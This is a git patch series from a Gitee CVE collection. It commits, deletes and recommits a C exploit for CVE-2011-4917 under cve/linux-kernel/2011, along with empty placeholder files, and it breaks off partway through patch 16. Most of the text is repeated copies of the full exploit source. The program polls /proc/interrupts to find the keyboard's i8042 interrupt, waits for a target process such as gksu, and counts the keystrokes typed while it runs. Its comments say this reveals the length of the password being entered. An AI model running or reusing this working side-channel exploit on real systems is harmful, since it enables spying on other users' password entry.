From 959380488ec88566de20558aa077233c55f1812c Mon Sep 17 00:00:00 2001 From: KunWang Date: Mon, 10 Apr 2023 08:27:05 +0000 Subject: [PATCH 01/26] add cve/linux-kernel. Signed-off-by: KunWang --- cve/linux-kernel/2011 | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/linux-kernel/2011 diff --git a/cve/linux-kernel/2011 b/cve/linux-kernel/2011 new file mode 100644 index 00000000..e69de29b -- Gitee From a92cd7be1681642e97085f9b69ba5ef4e8e07d10 Mon Sep 17 00:00:00 2001 From: KunWang Date: Mon, 10 Apr 2023 08:27:22 +0000 Subject: [PATCH 02/26] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/linux-kernel/2011?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/linux-kernel/2011 | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/linux-kernel/2011 diff --git a/cve/linux-kernel/2011 b/cve/linux-kernel/2011 deleted file mode 100644 index e69de29b..00000000 -- Gitee From ca099e1bf7b00b66573d5c44d674f25a9ed4c92f Mon Sep 17 00:00:00 2001 From: KunWang Date: Mon, 10 Apr 2023 08:29:01 +0000 Subject: [PATCH 03/26] =?UTF-8?q?=E6=96=B0=E5=BB=BA=202011?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/linux-kernel/2011/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/linux-kernel/2011/.keep diff --git a/cve/linux-kernel/2011/.keep b/cve/linux-kernel/2011/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From 1e483316c3e496c591ed931392790d806166af6a Mon Sep 17 00:00:00 2001 From: KunWang Date: Mon, 10 Apr 2023 08:29:18 +0000 Subject: [PATCH 04/26] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/linux-kernel/2011/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/linux-kernel/2011/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/linux-kernel/2011/.keep diff --git a/cve/linux-kernel/2011/.keep b/cve/linux-kernel/2011/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From e6e3407fa15f7966b44a93747143f1ee3c9df746 Mon Sep 17 00:00:00 2001 From: KunWang Date: Mon, 10 Apr 2023 08:29:35 +0000 Subject: [PATCH 05/26] =?UTF-8?q?=E6=96=B0=E5=BB=BA=202011?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/linux-kernel/2011/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/linux-kernel/2011/.keep diff --git a/cve/linux-kernel/2011/.keep b/cve/linux-kernel/2011/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From 2bb18f054a45c1833a45508b9e175bff0eaf3072 Mon Sep 17 00:00:00 2001 From: KunWang Date: Mon, 10 Apr 2023 08:31:48 +0000 Subject: [PATCH 06/26] =?UTF-8?q?add=20cve/linux-kernel/2011/CVE-2011-4917?= =?UTF-8?q?.c.=20CVE-2011-4917.c=E6=98=AFCVE-2011-4917=E6=BC=8F=E6=B4=9E?= =?UTF-8?q?=E7=9A=84=E5=88=A9=E7=94=A8=E4=BB=A3=E7=A0=81?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: KunWang --- cve/linux-kernel/2011/CVE-2011-4917.c | 178 ++++++++++++++++++++++++++ 1 file changed, 178 insertions(+) create mode 100644 cve/linux-kernel/2011/CVE-2011-4917.c diff --git a/cve/linux-kernel/2011/CVE-2011-4917.c b/cve/linux-kernel/2011/CVE-2011-4917.c new file mode 100644 index 00000000..949781c2 --- /dev/null +++ b/cve/linux-kernel/2011/CVE-2011-4917.c @@ -0,0 +1,178 @@ +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + + +int i8042_number; +int ints[1024], ints_prev[1024], ints_delta[1024]; + +char buffer[1024]; + +int reread_ints(int *interrupts, int int_count, char **names) +{ + int i; + int n, c1, c2; + char s1[1024], s2[1024]; + + int interrupts_fd; + FILE *interrupts_file; + + interrupts_fd = open("/proc/interrupts", O_RDONLY); + if (interrupts_fd == -1) + err(1, "open(\"/proc/interrupts\")"); + + interrupts_file = fdopen(interrupts_fd, "r"); + if (interrupts_file == NULL) + err(1, "fdopen"); + + if (fseek(interrupts_file, 0, SEEK_SET) < 0) + err(1, "lseek"); + + fgets(buffer, sizeof(buffer), interrupts_file); + + for (i = 0; i < int_count; i++) { + if (fgets(buffer, sizeof(buffer), interrupts_file) == NULL) { + fclose(interrupts_file); + return i; + } + + if (sscanf(buffer, "%d: %d %d %s %s", &n, &c1, &c2, s1, s2) < 3) { + fclose(interrupts_file); + return i; + } + + if (names != NULL && names[i] == NULL) + names[i] = strdup(s2); + + interrupts[i] = c1 + c2; + } + + fclose(interrupts_file); + return int_count; +} + +void init_i8042_number(void) +{ + int i; + int can_be_keyboard[1024]; + char *names[1024]; + int number_of_interrups, can_be_keyboard_numbers; + + number_of_interrups = reread_ints(ints_prev, sizeof(ints_prev), names); + + /* + * Identify the i8042 interrupt associated with the keyboard by: + * 1) name should be i8042 + * 2) interrupts count emitted in one second shouldn't be more than 100 + */ + for (i = 0; i < number_of_interrups; i++) + can_be_keyboard[i] = strcmp(names[i], "i8042") == 0; + + while (1) { + sleep(1); + reread_ints(ints, sizeof(ints), NULL); + + can_be_keyboard_numbers = 0; + for (i = 0; i < number_of_interrups; i++) { + can_be_keyboard[i] &= (ints[i] - ints_prev[i]) < 100; + if (can_be_keyboard[i]) + can_be_keyboard_numbers++; + + ints_prev[i] = ints[i]; + } + + if (can_be_keyboard_numbers == 1) { + for (i = 0; i < number_of_interrups; i++) + if (can_be_keyboard[i]) { + i8042_number = i; + printf("i8042 keyboard is #%d\n", i); + return; + } + } + } +} + +int i8042_read(void) +{ + reread_ints(ints, sizeof(ints), NULL); + ints_prev[i8042_number] = ints[i8042_number]; + + return ints[i8042_number]; +} + +int wait_for_program(char *pname) +{ + FILE *f; + int pid; + char s[1024]; + + snprintf(s, sizeof(s), "while :; do pgrep %s >/dev/null && break;" + " sleep 0.1; done", pname); + system(s); + snprintf(s, sizeof(s), "pgrep %s", pname); + f = popen(s, "r"); + if (f == NULL) + err(1, "popen"); + + if (fgets(buffer, sizeof(buffer), f) == NULL) + err(1, "fgets"); + + if (sscanf(buffer, "%d", &pid) < 1) + err(1, "sscanf"); + + pclose(f); + + return pid; +} + +int main(int argc, char *argv[]) +{ + int n, old, sum, i; + int pid; + char *pname = argv[1]; + + if (argc < 2) + errx(1, "usage: spy-interrupts gksu"); + + puts("Waiting for mouse activity..."); + init_i8042_number(); + + pid = wait_for_program(pname); + printf("%s is %d\n", pname, pid); + + old = i8042_read(); + + sum = 0; + + while (1) { + n = i8042_read(); + if (old == n) + usleep(10000); + else { + for (i = 0; i < n-old; i++) + putchar('.'); + fflush(stdout); + } + + sum += n - old; + old = n; + + if (kill(pid, 0) < 0 && errno == ESRCH) + break; + } + + /* + * #interrupts == 2 * #keystrokes. + * #keystrokes = len(password) - 1 because of ENTER after the password. + */ + printf("\n%d keystrokes\n", (sum-2)/2); + + return 0; +} \ No newline at end of file -- Gitee From ba54902eb26143d2ba52b29b380644e6b12a5b30 Mon Sep 17 00:00:00 2001 From: KunWang Date: Mon, 10 Apr 2023 08:32:00 +0000 Subject: [PATCH 07/26] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/linux-kernel/2011/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/linux-kernel/2011/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/linux-kernel/2011/.keep diff --git a/cve/linux-kernel/2011/.keep b/cve/linux-kernel/2011/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From d06507b745272cadd5b2f8253d679a094dfbb6c5 Mon Sep 17 00:00:00 2001 From: KunWang Date: Mon, 10 Apr 2023 08:32:25 +0000 Subject: [PATCH 08/26] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20CVE-2011-4917?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/linux-kernel/2011/CVE-2011-4917/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/linux-kernel/2011/CVE-2011-4917/.keep diff --git a/cve/linux-kernel/2011/CVE-2011-4917/.keep b/cve/linux-kernel/2011/CVE-2011-4917/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From b1a7b0d4865c9556fa7fd5e188791611e1cdb7fd Mon Sep 17 00:00:00 2001 From: KunWang Date: Mon, 10 Apr 2023 08:33:14 +0000 Subject: [PATCH 09/26] =?UTF-8?q?add=20cve/linux-kernel/2011/CVE-2011-4917?= =?UTF-8?q?/CVE-2011-4917.c.=20CVE-2011-4917=E7=9A=84=E5=88=A9=E7=94=A8?= =?UTF-8?q?=E4=BB=A3=E7=A0=81?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: KunWang --- .../2011/CVE-2011-4917/CVE-2011-4917.c | 178 ++++++++++++++++++ 1 file changed, 178 insertions(+) create mode 100644 cve/linux-kernel/2011/CVE-2011-4917/CVE-2011-4917.c diff --git a/cve/linux-kernel/2011/CVE-2011-4917/CVE-2011-4917.c b/cve/linux-kernel/2011/CVE-2011-4917/CVE-2011-4917.c new file mode 100644 index 00000000..949781c2 --- /dev/null +++ b/cve/linux-kernel/2011/CVE-2011-4917/CVE-2011-4917.c @@ -0,0 +1,178 @@ +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + + +int i8042_number; +int ints[1024], ints_prev[1024], ints_delta[1024]; + +char buffer[1024]; + +int reread_ints(int *interrupts, int int_count, char **names) +{ + int i; + int n, c1, c2; + char s1[1024], s2[1024]; + + int interrupts_fd; + FILE *interrupts_file; + + interrupts_fd = open("/proc/interrupts", O_RDONLY); + if (interrupts_fd == -1) + err(1, "open(\"/proc/interrupts\")"); + + interrupts_file = fdopen(interrupts_fd, "r"); + if (interrupts_file == NULL) + err(1, "fdopen"); + + if (fseek(interrupts_file, 0, SEEK_SET) < 0) + err(1, "lseek"); + + fgets(buffer, sizeof(buffer), interrupts_file); + + for (i = 0; i < int_count; i++) { + if (fgets(buffer, sizeof(buffer), interrupts_file) == NULL) { + fclose(interrupts_file); + return i; + } + + if (sscanf(buffer, "%d: %d %d %s %s", &n, &c1, &c2, s1, s2) < 3) { + fclose(interrupts_file); + return i; + } + + if (names != NULL && names[i] == NULL) + names[i] = strdup(s2); + + interrupts[i] = c1 + c2; + } + + fclose(interrupts_file); + return int_count; +} + +void init_i8042_number(void) +{ + int i; + int can_be_keyboard[1024]; + char *names[1024]; + int number_of_interrups, can_be_keyboard_numbers; + + number_of_interrups = reread_ints(ints_prev, sizeof(ints_prev), names); + + /* + * Identify the i8042 interrupt associated with the keyboard by: + * 1) name should be i8042 + * 2) interrupts count emitted in one second shouldn't be more than 100 + */ + for (i = 0; i < number_of_interrups; i++) + can_be_keyboard[i] = strcmp(names[i], "i8042") == 0; + + while (1) { + sleep(1); + reread_ints(ints, sizeof(ints), NULL); + + can_be_keyboard_numbers = 0; + for (i = 0; i < number_of_interrups; i++) { + can_be_keyboard[i] &= (ints[i] - ints_prev[i]) < 100; + if (can_be_keyboard[i]) + can_be_keyboard_numbers++; + + ints_prev[i] = ints[i]; + } + + if (can_be_keyboard_numbers == 1) { + for (i = 0; i < number_of_interrups; i++) + if (can_be_keyboard[i]) { + i8042_number = i; + printf("i8042 keyboard is #%d\n", i); + return; + } + } + } +} + +int i8042_read(void) +{ + reread_ints(ints, sizeof(ints), NULL); + ints_prev[i8042_number] = ints[i8042_number]; + + return ints[i8042_number]; +} + +int wait_for_program(char *pname) +{ + FILE *f; + int pid; + char s[1024]; + + snprintf(s, sizeof(s), "while :; do pgrep %s >/dev/null && break;" + " sleep 0.1; done", pname); + system(s); + snprintf(s, sizeof(s), "pgrep %s", pname); + f = popen(s, "r"); + if (f == NULL) + err(1, "popen"); + + if (fgets(buffer, sizeof(buffer), f) == NULL) + err(1, "fgets"); + + if (sscanf(buffer, "%d", &pid) < 1) + err(1, "sscanf"); + + pclose(f); + + return pid; +} + +int main(int argc, char *argv[]) +{ + int n, old, sum, i; + int pid; + char *pname = argv[1]; + + if (argc < 2) + errx(1, "usage: spy-interrupts gksu"); + + puts("Waiting for mouse activity..."); + init_i8042_number(); + + pid = wait_for_program(pname); + printf("%s is %d\n", pname, pid); + + old = i8042_read(); + + sum = 0; + + while (1) { + n = i8042_read(); + if (old == n) + usleep(10000); + else { + for (i = 0; i < n-old; i++) + putchar('.'); + fflush(stdout); + } + + sum += n - old; + old = n; + + if (kill(pid, 0) < 0 && errno == ESRCH) + break; + } + + /* + * #interrupts == 2 * #keystrokes. + * #keystrokes = len(password) - 1 because of ENTER after the password. + */ + printf("\n%d keystrokes\n", (sum-2)/2); + + return 0; +} \ No newline at end of file -- Gitee From 969c5a1d9077ab0276a25b0f3d602ed66af85963 Mon Sep 17 00:00:00 2001 From: KunWang Date: Mon, 10 Apr 2023 08:34:24 +0000 Subject: [PATCH 10/26] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/linux-kernel/2011/CVE-2011-4917.c?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/linux-kernel/2011/CVE-2011-4917.c | 178 -------------------------- 1 file changed, 178 deletions(-) delete mode 100644 cve/linux-kernel/2011/CVE-2011-4917.c diff --git a/cve/linux-kernel/2011/CVE-2011-4917.c b/cve/linux-kernel/2011/CVE-2011-4917.c deleted file mode 100644 index 949781c2..00000000 --- a/cve/linux-kernel/2011/CVE-2011-4917.c +++ /dev/null @@ -1,178 +0,0 @@ -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include - - -int i8042_number; -int ints[1024], ints_prev[1024], ints_delta[1024]; - -char buffer[1024]; - -int reread_ints(int *interrupts, int int_count, char **names) -{ - int i; - int n, c1, c2; - char s1[1024], s2[1024]; - - int interrupts_fd; - FILE *interrupts_file; - - interrupts_fd = open("/proc/interrupts", O_RDONLY); - if (interrupts_fd == -1) - err(1, "open(\"/proc/interrupts\")"); - - interrupts_file = fdopen(interrupts_fd, "r"); - if (interrupts_file == NULL) - err(1, "fdopen"); - - if (fseek(interrupts_file, 0, SEEK_SET) < 0) - err(1, "lseek"); - - fgets(buffer, sizeof(buffer), interrupts_file); - - for (i = 0; i < int_count; i++) { - if (fgets(buffer, sizeof(buffer), interrupts_file) == NULL) { - fclose(interrupts_file); - return i; - } - - if (sscanf(buffer, "%d: %d %d %s %s", &n, &c1, &c2, s1, s2) < 3) { - fclose(interrupts_file); - return i; - } - - if (names != NULL && names[i] == NULL) - names[i] = strdup(s2); - - interrupts[i] = c1 + c2; - } - - fclose(interrupts_file); - return int_count; -} - -void init_i8042_number(void) -{ - int i; - int can_be_keyboard[1024]; - char *names[1024]; - int number_of_interrups, can_be_keyboard_numbers; - - number_of_interrups = reread_ints(ints_prev, sizeof(ints_prev), names); - - /* - * Identify the i8042 interrupt associated with the keyboard by: - * 1) name should be i8042 - * 2) interrupts count emitted in one second shouldn't be more than 100 - */ - for (i = 0; i < number_of_interrups; i++) - can_be_keyboard[i] = strcmp(names[i], "i8042") == 0; - - while (1) { - sleep(1); - reread_ints(ints, sizeof(ints), NULL); - - can_be_keyboard_numbers = 0; - for (i = 0; i < number_of_interrups; i++) { - can_be_keyboard[i] &= (ints[i] - ints_prev[i]) < 100; - if (can_be_keyboard[i]) - can_be_keyboard_numbers++; - - ints_prev[i] = ints[i]; - } - - if (can_be_keyboard_numbers == 1) { - for (i = 0; i < number_of_interrups; i++) - if (can_be_keyboard[i]) { - i8042_number = i; - printf("i8042 keyboard is #%d\n", i); - return; - } - } - } -} - -int i8042_read(void) -{ - reread_ints(ints, sizeof(ints), NULL); - ints_prev[i8042_number] = ints[i8042_number]; - - return ints[i8042_number]; -} - -int wait_for_program(char *pname) -{ - FILE *f; - int pid; - char s[1024]; - - snprintf(s, sizeof(s), "while :; do pgrep %s >/dev/null && break;" - " sleep 0.1; done", pname); - system(s); - snprintf(s, sizeof(s), "pgrep %s", pname); - f = popen(s, "r"); - if (f == NULL) - err(1, "popen"); - - if (fgets(buffer, sizeof(buffer), f) == NULL) - err(1, "fgets"); - - if (sscanf(buffer, "%d", &pid) < 1) - err(1, "sscanf"); - - pclose(f); - - return pid; -} - -int main(int argc, char *argv[]) -{ - int n, old, sum, i; - int pid; - char *pname = argv[1]; - - if (argc < 2) - errx(1, "usage: spy-interrupts gksu"); - - puts("Waiting for mouse activity..."); - init_i8042_number(); - - pid = wait_for_program(pname); - printf("%s is %d\n", pname, pid); - - old = i8042_read(); - - sum = 0; - - while (1) { - n = i8042_read(); - if (old == n) - usleep(10000); - else { - for (i = 0; i < n-old; i++) - putchar('.'); - fflush(stdout); - } - - sum += n - old; - old = n; - - if (kill(pid, 0) < 0 && errno == ESRCH) - break; - } - - /* - * #interrupts == 2 * #keystrokes. - * #keystrokes = len(password) - 1 because of ENTER after the password. - */ - printf("\n%d keystrokes\n", (sum-2)/2); - - return 0; -} \ No newline at end of file -- Gitee From d1c1556e1822f901a587503608d160997df8a1d1 Mon Sep 17 00:00:00 2001 From: KunWang Date: Mon, 10 Apr 2023 08:34:56 +0000 Subject: [PATCH 11/26] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20CVE-2011-4917?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/linux-kernel/2011/CVE-2011-4917/CVE-2011-4917/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/linux-kernel/2011/CVE-2011-4917/CVE-2011-4917/.keep diff --git a/cve/linux-kernel/2011/CVE-2011-4917/CVE-2011-4917/.keep b/cve/linux-kernel/2011/CVE-2011-4917/CVE-2011-4917/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From 56e3b53471d8e999f0887aea067170d7a785e820 Mon Sep 17 00:00:00 2001 From: KunWang Date: Mon, 10 Apr 2023 08:35:36 +0000 Subject: [PATCH 12/26] add cve/linux-kernel/2011/CVE-2011-4917/CVE-2011-4917/CVE-2011-4917.c. Signed-off-by: KunWang --- cve/linux-kernel/2011/CVE-2011-4917/CVE-2011-4917/CVE-2011-4917.c | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/linux-kernel/2011/CVE-2011-4917/CVE-2011-4917/CVE-2011-4917.c diff --git a/cve/linux-kernel/2011/CVE-2011-4917/CVE-2011-4917/CVE-2011-4917.c b/cve/linux-kernel/2011/CVE-2011-4917/CVE-2011-4917/CVE-2011-4917.c new file mode 100644 index 00000000..e69de29b -- Gitee From 0f5e366e69c3ca0028c1882b02986b03fe84a1a2 Mon Sep 17 00:00:00 2001 From: KunWang Date: Mon, 10 Apr 2023 08:36:15 +0000 Subject: [PATCH 13/26] =?UTF-8?q?update=20cve/linux-kernel/2011/CVE-2011-4?= =?UTF-8?q?917/CVE-2011-4917/CVE-2011-4917.c.=20CVE-2011-4917=E5=88=A9?= =?UTF-8?q?=E7=94=A8=E4=BB=A3=E7=A0=81?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: KunWang --- .../CVE-2011-4917/CVE-2011-4917.c | 178 ++++++++++++++++++ 1 file changed, 178 insertions(+) diff --git a/cve/linux-kernel/2011/CVE-2011-4917/CVE-2011-4917/CVE-2011-4917.c b/cve/linux-kernel/2011/CVE-2011-4917/CVE-2011-4917/CVE-2011-4917.c index e69de29b..bab4fad3 100644 --- a/cve/linux-kernel/2011/CVE-2011-4917/CVE-2011-4917/CVE-2011-4917.c +++ b/cve/linux-kernel/2011/CVE-2011-4917/CVE-2011-4917/CVE-2011-4917.c @@ -0,0 +1,178 @@ +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + + +int i8042_number; +int ints[1024], ints_prev[1024], ints_delta[1024]; + +char buffer[1024]; + +int reread_ints(int *interrupts, int int_count, char **names) +{ + int i; + int n, c1, c2; + char s1[1024], s2[1024]; + + int interrupts_fd; + FILE *interrupts_file; + + interrupts_fd = open("/proc/interrupts", O_RDONLY); + if (interrupts_fd == -1) + err(1, "open(\"/proc/interrupts\")"); + + interrupts_file = fdopen(interrupts_fd, "r"); + if (interrupts_file == NULL) + err(1, "fdopen"); + + if (fseek(interrupts_file, 0, SEEK_SET) < 0) + err(1, "lseek"); + + fgets(buffer, sizeof(buffer), interrupts_file); + + for (i = 0; i < int_count; i++) { + if (fgets(buffer, sizeof(buffer), interrupts_file) == NULL) { + fclose(interrupts_file); + return i; + } + + if (sscanf(buffer, "%d: %d %d %s %s", &n, &c1, &c2, s1, s2) < 3) { + fclose(interrupts_file); + return i; + } + + if (names != NULL && names[i] == NULL) + names[i] = strdup(s2); + + interrupts[i] = c1 + c2; + } + + fclose(interrupts_file); + return int_count; +} + +void init_i8042_number(void) +{ + int i; + int can_be_keyboard[1024]; + char *names[1024]; + int number_of_interrups, can_be_keyboard_numbers; + + number_of_interrups = reread_ints(ints_prev, sizeof(ints_prev), names); + + /* + * Identify the i8042 interrupt associated with the keyboard by: + * 1) name should be i8042 + * 2) interrupts count emitted in one second shouldn't be more than 100 + */ + for (i = 0; i < number_of_interrups; i++) + can_be_keyboard[i] = strcmp(names[i], "i8042") == 0; + + while (1) { + sleep(1); + reread_ints(ints, sizeof(ints), NULL); + + can_be_keyboard_numbers = 0; + for (i = 0; i < number_of_interrups; i++) { + can_be_keyboard[i] &= (ints[i] - ints_prev[i]) < 100; + if (can_be_keyboard[i]) + can_be_keyboard_numbers++; + + ints_prev[i] = ints[i]; + } + + if (can_be_keyboard_numbers == 1) { + for (i = 0; i < number_of_interrups; i++) + if (can_be_keyboard[i]) { + i8042_number = i; + printf("i8042 keyboard is #%d\n", i); + return; + } + } + } +} + +int i8042_read(void) +{ + reread_ints(ints, sizeof(ints), NULL); + ints_prev[i8042_number] = ints[i8042_number]; + + return ints[i8042_number]; +} + +int wait_for_program(char *pname) +{ + FILE *f; + int pid; + char s[1024]; + + snprintf(s, sizeof(s), "while :; do pgrep %s >/dev/null && break;" + " sleep 0.1; done", pname); + system(s); + snprintf(s, sizeof(s), "pgrep %s", pname); + f = popen(s, "r"); + if (f == NULL) + err(1, "popen"); + + if (fgets(buffer, sizeof(buffer), f) == NULL) + err(1, "fgets"); + + if (sscanf(buffer, "%d", &pid) < 1) + err(1, "sscanf"); + + pclose(f); + + return pid; +} + +int main(int argc, char *argv[]) +{ + int n, old, sum, i; + int pid; + char *pname = argv[1]; + + if (argc < 2) + errx(1, "usage: spy-interrupts gksu"); + + puts("Waiting for mouse activity..."); + init_i8042_number(); + + pid = wait_for_program(pname); + printf("%s is %d\n", pname, pid); + + old = i8042_read(); + + sum = 0; + + while (1) { + n = i8042_read(); + if (old == n) + usleep(10000); + else { + for (i = 0; i < n-old; i++) + putchar('.'); + fflush(stdout); + } + + sum += n - old; + old = n; + + if (kill(pid, 0) < 0 && errno == ESRCH) + break; + } + + /* + * #interrupts == 2 * #keystrokes. + * #keystrokes = len(password) - 1 because of ENTER after the password. + */ + printf("\n%d keystrokes\n", (sum-2)/2); + + return 0; +} \ No newline at end of file -- Gitee From 5d086e9268a04715462703310e50daa0b88dadf8 Mon Sep 17 00:00:00 2001 From: KunWang Date: Mon, 10 Apr 2023 08:38:02 +0000 Subject: [PATCH 14/26] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/linux-kernel/2011/CVE-2011-4917/CVE-2011-4917.c?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../2011/CVE-2011-4917/CVE-2011-4917.c | 178 ------------------ 1 file changed, 178 deletions(-) delete mode 100644 cve/linux-kernel/2011/CVE-2011-4917/CVE-2011-4917.c diff --git a/cve/linux-kernel/2011/CVE-2011-4917/CVE-2011-4917.c b/cve/linux-kernel/2011/CVE-2011-4917/CVE-2011-4917.c deleted file mode 100644 index 949781c2..00000000 --- a/cve/linux-kernel/2011/CVE-2011-4917/CVE-2011-4917.c +++ /dev/null @@ -1,178 +0,0 @@ -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include - - -int i8042_number; -int ints[1024], ints_prev[1024], ints_delta[1024]; - -char buffer[1024]; - -int reread_ints(int *interrupts, int int_count, char **names) -{ - int i; - int n, c1, c2; - char s1[1024], s2[1024]; - - int interrupts_fd; - FILE *interrupts_file; - - interrupts_fd = open("/proc/interrupts", O_RDONLY); - if (interrupts_fd == -1) - err(1, "open(\"/proc/interrupts\")"); - - interrupts_file = fdopen(interrupts_fd, "r"); - if (interrupts_file == NULL) - err(1, "fdopen"); - - if (fseek(interrupts_file, 0, SEEK_SET) < 0) - err(1, "lseek"); - - fgets(buffer, sizeof(buffer), interrupts_file); - - for (i = 0; i < int_count; i++) { - if (fgets(buffer, sizeof(buffer), interrupts_file) == NULL) { - fclose(interrupts_file); - return i; - } - - if (sscanf(buffer, "%d: %d %d %s %s", &n, &c1, &c2, s1, s2) < 3) { - fclose(interrupts_file); - return i; - } - - if (names != NULL && names[i] == NULL) - names[i] = strdup(s2); - - interrupts[i] = c1 + c2; - } - - fclose(interrupts_file); - return int_count; -} - -void init_i8042_number(void) -{ - int i; - int can_be_keyboard[1024]; - char *names[1024]; - int number_of_interrups, can_be_keyboard_numbers; - - number_of_interrups = reread_ints(ints_prev, sizeof(ints_prev), names); - - /* - * Identify the i8042 interrupt associated with the keyboard by: - * 1) name should be i8042 - * 2) interrupts count emitted in one second shouldn't be more than 100 - */ - for (i = 0; i < number_of_interrups; i++) - can_be_keyboard[i] = strcmp(names[i], "i8042") == 0; - - while (1) { - sleep(1); - reread_ints(ints, sizeof(ints), NULL); - - can_be_keyboard_numbers = 0; - for (i = 0; i < number_of_interrups; i++) { - can_be_keyboard[i] &= (ints[i] - ints_prev[i]) < 100; - if (can_be_keyboard[i]) - can_be_keyboard_numbers++; - - ints_prev[i] = ints[i]; - } - - if (can_be_keyboard_numbers == 1) { - for (i = 0; i < number_of_interrups; i++) - if (can_be_keyboard[i]) { - i8042_number = i; - printf("i8042 keyboard is #%d\n", i); - return; - } - } - } -} - -int i8042_read(void) -{ - reread_ints(ints, sizeof(ints), NULL); - ints_prev[i8042_number] = ints[i8042_number]; - - return ints[i8042_number]; -} - -int wait_for_program(char *pname) -{ - FILE *f; - int pid; - char s[1024]; - - snprintf(s, sizeof(s), "while :; do pgrep %s >/dev/null && break;" - " sleep 0.1; done", pname); - system(s); - snprintf(s, sizeof(s), "pgrep %s", pname); - f = popen(s, "r"); - if (f == NULL) - err(1, "popen"); - - if (fgets(buffer, sizeof(buffer), f) == NULL) - err(1, "fgets"); - - if (sscanf(buffer, "%d", &pid) < 1) - err(1, "sscanf"); - - pclose(f); - - return pid; -} - -int main(int argc, char *argv[]) -{ - int n, old, sum, i; - int pid; - char *pname = argv[1]; - - if (argc < 2) - errx(1, "usage: spy-interrupts gksu"); - - puts("Waiting for mouse activity..."); - init_i8042_number(); - - pid = wait_for_program(pname); - printf("%s is %d\n", pname, pid); - - old = i8042_read(); - - sum = 0; - - while (1) { - n = i8042_read(); - if (old == n) - usleep(10000); - else { - for (i = 0; i < n-old; i++) - putchar('.'); - fflush(stdout); - } - - sum += n - old; - old = n; - - if (kill(pid, 0) < 0 && errno == ESRCH) - break; - } - - /* - * #interrupts == 2 * #keystrokes. - * #keystrokes = len(password) - 1 because of ENTER after the password. - */ - printf("\n%d keystrokes\n", (sum-2)/2); - - return 0; -} \ No newline at end of file -- Gitee From 6573fee46bce2b4d0cfd7fbad42b2dd45edd4124 Mon Sep 17 00:00:00 2001 From: KunWang Date: Mon, 10 Apr 2023 08:38:20 +0000 Subject: [PATCH 15/26] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/linux-kernel/2011/CVE-2011-4917/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/linux-kernel/2011/CVE-2011-4917/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/linux-kernel/2011/CVE-2011-4917/.keep diff --git a/cve/linux-kernel/2011/CVE-2011-4917/.keep b/cve/linux-kernel/2011/CVE-2011-4917/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From 1ef9ab9c3abadc50a7874847b09400e70b865a23 Mon Sep 17 00:00:00 2001 From: KunWang Date: Mon, 10 Apr 2023 08:40:16 +0000 Subject: [PATCH 16/26] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20CVE-2011-4917?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../2011/CVE-2011-4917/CVE-2011-4917/CVE-2011-4917/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/linux-kernel/2011/CVE-2011-4917/CVE-2011-4917/CVE-2011-4917/.keep diff --git 